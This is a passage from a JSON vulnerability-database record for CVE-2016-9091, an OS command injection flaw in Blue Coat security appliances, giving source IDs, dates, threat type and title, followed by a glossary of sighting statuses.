        "date": "2017-04-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "date": "2017-04-03T00:00:00",
        "db": "BID",
        "id": "97372"
      },
      {
        "date": "2017-05-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "date": "2017-04-03T03:33:00",
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "date": "2017-04-05T15:59:00.170000",
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "date": "2017-04-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "date": "2017-08-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "date": "2017-04-11T00:02:00",
        "db": "BID",
        "id": "97372"
      },
      {
        "date": "2017-05-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "date": "2017-08-16T01:29:11.507000",
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "date": "2017-04-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Blue Coat Advanced Secure Gateway and Content Analysis System In OS Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ],
    "trust": 0.6
  }
}



Sightings


Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.